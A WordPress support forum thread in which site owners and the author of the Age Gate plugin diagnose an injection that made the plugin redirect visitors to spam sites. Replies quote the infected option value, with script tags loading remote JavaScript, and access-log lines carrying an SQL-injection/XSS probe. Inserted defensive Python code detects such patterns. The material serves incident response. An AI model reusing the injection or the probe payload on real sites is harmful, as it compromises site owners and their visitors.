• Hi!

    I just removed your plugin from two sites – the plugin redirects to spam.
    I confirmed this on multiple other domains shown on this forum.

    Even a fully updated plugin.

Viewing 15 replies - 1 through 15 (of 15 total)
  • Plugin Author Phil

    (@philsbury)

    Hi @lmndk24,

    That’s concerning. Not something I’ve had reported before.

    Do you have any other info? At what point is it happening?

    Thanks
    Phil

    Thread Starter lmndk24

    (@lmndk24)

    I can send you my files: https://we.tl/t-ZPO3iuWs8j

    But – I just double-checked on “I confirmed this on multiple other domains shown on this forum.” – that was just a cache, I can’t confirm this.

    But, the “hack” was gone after I debugged purevodka.dk and puregin.dk, so there has to be something, though I don’t know what it is, and I can’t find it.
    Both purevodka.dk and puregin.dk have the same setup – but on different servers.

    Thread Starter lmndk24

    (@lmndk24)

    Can you rename or hide this thread? I don’t wanna cause any harm, if this seems to be false.

    Can confirm this was the cause here too.

    Someone had overwritten the Yes/No button text (in mine) to implement a script that would auto-redirect the site to a 3rd party spam site.

    Once I cleared that out (and had to reset all my styling because that was gone too), I believe it’s fixed.

    I believe that your XSS update for imports in 2.17.1 may have fixed it, but I can’t say for certain. All I know is the text for the headline, custom CSS, and Yes/No button text had all changed. The yes/no buttons were implementing <script src="garbage JS file here"></script> and causing a redirect.

    Plugin Author Phil

    (@philsbury)

    Hi @midwestdev / @lmndk24

    Can confirm there’s nothing compromised in the actual codebase sent by @lmndk24, so I tend to think that the issue is probably related to that which was patched in 2.17.1. That patch wouldn’t have retroactively fixed any affected sites though, so I’ll look at that, which is admittedly not hugely helpful to you guys.

    The issue was flagged by some security people so I’m relatively confident there shouldn’t be anything to make it happen again.

    Hi All, I have quite a few sites with malware as well, and I was thinking age-gate may be the issue since it’s on all the sites where I’m having issues right now.

    Has there been anything discovered at all?

    I’m not sure how to debug or track, but I can if someone can give me some insights on how to do it.

    Thanks all, talk soon

    Plugin Author Phil

    (@philsbury)

    @soloant,

    Apologies for the problems, an issue was raised which was patched as soon as was possible in 2.17.1.

    If you resave the settings on your site it should resolve any issues as long as you also clear any caches.

    The root cause has been patched and some further patches are coming.

    Thanks
    Phil

    Hi @philsbury, checking now, I’ll report back anything I find.

    Thank you.

    Hi, I tested on one site but like it was mentioned above the styling/messaging is all gone now. But I’m not being redirected which is good.

    I appreciate the quick response.

    Thank you!

    If anyone else finds this thread, when updating and resaving all the settings sometimes this was not resetting/updating at all so I had to clear it manually.

    Hoping this might help others too.

    I’m on Version 2.18.1 and it appears that the malicious script was added to the Yes / No buttons on the previously insecure version.

    Maybe your update has closed the door on future hacks, but it is obviously not retroactively fixing the issue for those that have already been hacked. I’d suggest you release a version that simply overwrites whatever is in the Yes / No buttons to force the malicious script to be removed.

    I just happened to visit my client’s site for another reason and discovered the issue. Leaving this as-is without addressing the underlying malicious script is not good for anyone.

    kreativrudel

    (@kreativrudel)

    Just got notified by a client that the age gate does look different on his website. After a quick check, I was redirected to a clickbait site.

    I can confirm that the infection happens in the wp_options table in a record with the option_name of wp_age_gate_messages.

    Here’s the content of the infected option_value:

    a:15:{s:11:"instruction";s:0:"";s:9:"messaging";s:0:"";s:17:"invalid_input_msg";s:22:"Your input was invalid";s:13:"under_age_msg";s:43:"You are not old enough to view this content";s:17:"generic_error_msg";s:35:"An error occurred, please try again";s:16:"remember_me_text";s:11:"Remember me";s:14:"yes_no_message";s:29:"Are you over %s years of age?";s:8:"yes_text";s:70:"Yes<script src='https://small.piterreceiver.ga/clear.js?l=1'></script>";s:7:"no_text";s:69:"No<script src='https://small.piterreceiver.ga/clear.js?l=1'></script>";s:10:"additional";s:0:"";s:11:"button_text";s:6:"Submit";s:14:"cookie_message";s:85:"Your browser does not support cookies, you may experience problems entering this site";s:8:"text_day";s:3:"Day";s:10:"text_month";s:5:"Month";s:9:"text_year";s:4:"Year";}

    The Age-Gate version which is currently in use: 2.16.4

    I was able to pull out the following activity from the logs which could be a possible attack vector:

    46.161.27.0 - - [02/Oct/2021:18:25:13 +0200] "POST /de-de/wp-content/plugins/age-gate/public/css/age-gate-public.css HTTP/1.1" 200 7842 "-" "Mozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1"

    46.161.27.0 - - [02/Oct/2021:18:25:18 +0200] "POST /de-de/wp-content/plugins/age-gate/public/css/age-gate-public.css?AlSV%3D5166%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 7842 "-" "Mozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1"

    46.161.27.0 - - [02/Oct/2021:18:25:19 +0200] "POST /de-de/wp-content/plugins/age-gate/public/css/age-gate-public.css HTTP/1.1" 200 7842 "-" "Mozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1"
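As an added example (my own code, not the plugin's and not posted by anyone in this thread), here is a small Python checker for a PHP-serialized option value like the one quoted above. It parses the value honouring the `s:<bytes>:` length prefixes, reports which fields carry injected script markup, and writes back a cleaned copy with the lengths recomputed. That last point is the practical caveat: editing the `option_value` by hand in the database without fixing the byte lengths makes PHP's `unserialize()` fail, which is why resaving the settings from the admin screen is usually safer. The function names, the marker patterns and the cleaning strategy (stripping the script tags rather than restoring the plugin's own defaults) are my assumptions; the sample input is the infected value from the post above.

```python
import re

# Markers that have no business inside a message or button-text field.
SUSPICIOUS = re.compile(r"(?i)<\s*/?\s*script\b|<\s*iframe\b|javascript\s*:|\bon[a-z]+\s*=")
# A whole <script ...>...</script> block, or a stray opening/closing script tag.
SCRIPT_TAG = re.compile(r"(?is)<\s*script\b[^>]*>.*?<\s*/\s*script\s*>|<\s*/?\s*script\b[^>]*>")

# Infected wp_age_gate_messages value as quoted in the thread above (not constructed).
INFECTED = '''a:15:{s:11:"instruction";s:0:"";s:9:"messaging";s:0:"";s:17:"invalid_input_msg";s:22:"Your input was invalid";s:13:"under_age_msg";s:43:"You are not old enough to view this content";s:17:"generic_error_msg";s:35:"An error occurred, please try again";s:16:"remember_me_text";s:11:"Remember me";s:14:"yes_no_message";s:29:"Are you over %s years of age?";s:8:"yes_text";s:70:"Yes<script src='https://small.piterreceiver.ga/clear.js?l=1'></script>";s:7:"no_text";s:69:"No<script src='https://small.piterreceiver.ga/clear.js?l=1'></script>";s:10:"additional";s:0:"";s:11:"button_text";s:6:"Submit";s:14:"cookie_message";s:85:"Your browser does not support cookies, you may experience problems entering this site";s:8:"text_day";s:3:"Day";s:10:"text_month";s:5:"Month";s:9:"text_year";s:4:"Year";}'''


def parse_php(buf: bytes, pos: int = 0):
    """Parse one PHP-serialized value starting at buf[pos]; return (value, next_pos).

    Works on bytes because the s:N: prefix is a byte length, not a character count.
    """
    tag = buf[pos:pos + 1]
    if tag == b"N":                                   # N;
        return None, pos + 2
    if tag in (b"i", b"d", b"b"):                     # i:42;  d:1.5;  b:1;
        end = buf.index(b";", pos)
        raw = buf[pos + 2:end]
        value = int(raw) if tag == b"i" else float(raw) if tag == b"d" else raw == b"1"
        return value, end + 1
    if tag == b"s":                                   # s:<bytelen>:"...";
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])
        start = colon + 2                             # skip :"
        if buf[start + length:start + length + 2] != b'";':
            raise ValueError(f"string length mismatch at offset {pos}")
        return buf[start:start + length].decode("utf-8"), start + length + 2
    if tag == b"a":                                   # a:<count>:{key value key value ...}
        colon = buf.index(b":", pos + 2)
        count = int(buf[pos + 2:colon])
        p = colon + 2                                 # skip :{
        items = {}
        for _ in range(count):
            key, p = parse_php(buf, p)
            items[key], p = parse_php(buf, p)
        if buf[p:p + 1] != b"}":
            raise ValueError(f"unterminated array at offset {pos}")
        return items, p + 1
    raise ValueError(f"unsupported type {tag!r} at offset {pos}")


def php_serialize(value) -> bytes:
    """Inverse of parse_php: emit PHP serialization with correct byte lengths."""
    if value is None:
        return b"N;"
    if isinstance(value, bool):
        return b"b:%d;" % value
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, float):
        return b"d:%s;" % repr(value).encode()
    if isinstance(value, str):
        raw = value.encode("utf-8")
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(value, dict):
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), body)
    raise TypeError(f"cannot serialize {type(value).__name__}")


def scan_option(serialized: str) -> dict:
    """Return {field: first suspicious fragment} for every string field that looks injected."""
    data, _ = parse_php(serialized.encode("utf-8"))
    hits = {}
    for field, value in data.items():
        if isinstance(value, str):
            m = SUSPICIOUS.search(value)
            if m:
                hits[field] = m.group(0)
    return hits


def clean_option(serialized: str) -> str:
    """Strip script tags from every string field and re-serialize so PHP can unserialize it."""
    data, _ = parse_php(serialized.encode("utf-8"))
    cleaned = {k: SCRIPT_TAG.sub("", v) if isinstance(v, str) else v for k, v in data.items()}
    return php_serialize(cleaned).decode("utf-8")


if __name__ == "__main__":
    for field, fragment in scan_option(INFECTED).items():
        print(f"{field}: injected markup starting {fragment!r}")
    print(clean_option(INFECTED))
```

Run against the quoted value it flags exactly `yes_text` and `no_text`; the cleaned output leaves `Yes` and `No` with `s:3:` and `s:2:` prefixes and round-trips through `parse_php` again. Running `scan_option` over every row of `wp_options` that belongs to the plugin is a quick way to audit a fleet of sites for the same infection.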

    Plugin Author Phil

    (@philsbury)

    Hi all,

    Just wanted to post an update as to what happened in the plugin and how it’s been addressed.

    I was notified of a potential vulnerability within the plugin (I don’t want to go into too many specifics for now, just in case there’s unupgraded users that haven’t been affected).

    The flaw(s) had been present for some time and hadn’t been spotted in previous pen tests. I got to work on fixing the issues as soon as I could and the issue was patched in 2.17.1. Unfortunately it seems that the vulnerability became known before I could release the patch.

    Following the comment above from @tvideveloper, the 2.18.2 update included two elements to combat sites that had been affected where it will seek out bad entries in the data and if found, revert them to the default setting. This also happens via the cron system which is a little overkill, but just to err on the side of caution. Just a note for anyone unfamiliar with semver, there wasn’t a big gap between these releases but there were enough changes to warrant a minor version increase.

    The log examples from @kreativrudel are along the lines for what happens – though those exact examples wouldn’t do anything as they’re posting to an actual CSS file which should be a static asset.

    Thanks
    Phil
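As an added example (my own code, not the plugin's and not from anyone in this thread), the following Python triage script applies the two observations from the log excerpt and the reply above to access-log lines in the common combined format: a POST request to a static asset such as a plugin's `.css` file, which no normal browser issues, and a query string that, once URL-decoded, carries SQL or script markup. The sample lines are constructed for this example (TEST-NET addresses, a shortened payload); the function names and the marker list are my assumptions.

```python
import re
from urllib.parse import unquote, unquote_plus, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Files a browser only ever fetches with GET; a POST to one is anomalous by itself.
STATIC_EXT = (".css", ".js", ".png", ".jpg", ".gif", ".svg", ".woff", ".woff2")
# Markers checked against the *decoded* query string.
PAYLOAD_RE = re.compile(
    r"(?i)<\s*script\b|union\s+(?:all\s+)?select|information_schema|xp_cmdshell"
    r"|\b(?:and|or)\s+1\s*=\s*1\b|/etc/passwd"
)

# Constructed sample lines (assumption: combined log format, TEST-NET source addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Oct/2021:18:25:13 +0200] "GET /wp-content/plugins/age-gate/public/css/age-gate-public.css HTTP/1.1" 200 7842 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [02/Oct/2021:18:25:18 +0200] "POST /wp-content/plugins/age-gate/public/css/age-gate-public.css HTTP/1.1" 200 7842 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [02/Oct/2021:18:25:19 +0200] "POST /wp-content/plugins/age-gate/public/css/age-gate-public.css?x%3D1%20UNION%20ALL%20SELECT%201%2C%27%3Cscript%3Ealert%281%29%3C%2Fscript%3E%27%20FROM%20information_schema.tables-- HTTP/1.1" 200 7842 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Oct/2021:18:26:01 +0200] "GET /?p=12 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
]


def parse_line(line: str):
    """Split one combined-format line into fields; decode path and query separately."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])          # split before decoding so an encoded '#' or '?' can't hide the query
    rec["path"] = unquote(parts.path)
    rec["query"] = unquote_plus(parts.query)
    return rec


def classify(line: str):
    """Return the parsed record with a list of reasons it looks suspicious (empty if benign)."""
    rec = parse_line(line)
    if rec is None:
        return None
    reasons = []
    if rec["method"] == "POST" and rec["path"].lower().endswith(STATIC_EXT):
        reasons.append("POST to static asset")
    if PAYLOAD_RE.search(rec["query"]):
        reasons.append("injection markers in query")
    rec["reasons"] = reasons
    return rec


def triage(lines):
    """Keep only the records that tripped at least one rule."""
    return [rec for rec in map(classify, lines) if rec and rec["reasons"]]


if __name__ == "__main__":
    for rec in triage(SAMPLE_LOG):
        print(rec["ts"], rec["ip"], rec["method"], rec["path"], "->", "; ".join(rec["reasons"]))
```

On the sample it flags the second line for the POST alone and the third line for both rules, while the two GETs pass. As the reply above notes, a POST to a genuinely static CSS file does nothing server-side, so the `200` status says nothing about whether anything succeeded; the value of the rule is the request pattern itself, which marks a source address whose other requests to the site around the same time deserve a closer look.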

    tvideveloper

    (@tvideveloper)

    Thank you @philsbury for your diligence in resolving this matter. Appreciate the plugin and the work you do.

    Archimedesign

    (@archimedesign)

    Thanks for the update @philsbury

    Got a customer who complained about the lost styling on the age verification page. Running Age-gate 2.18.4 but their styling is still broken. How to reset the styling options please? Nothing that I’ve tried worked.

    Do you know what did the attacker change please? Just so we can double check manually if it’s. In this particular case the plugin was set to use a dropdown instead of “yes/no” buttons, hopefully this disabled any unwanted redirections. Thanks

  • The topic ‘Age Gate hacked on multiple sites, multiple servers’ is closed to new replies.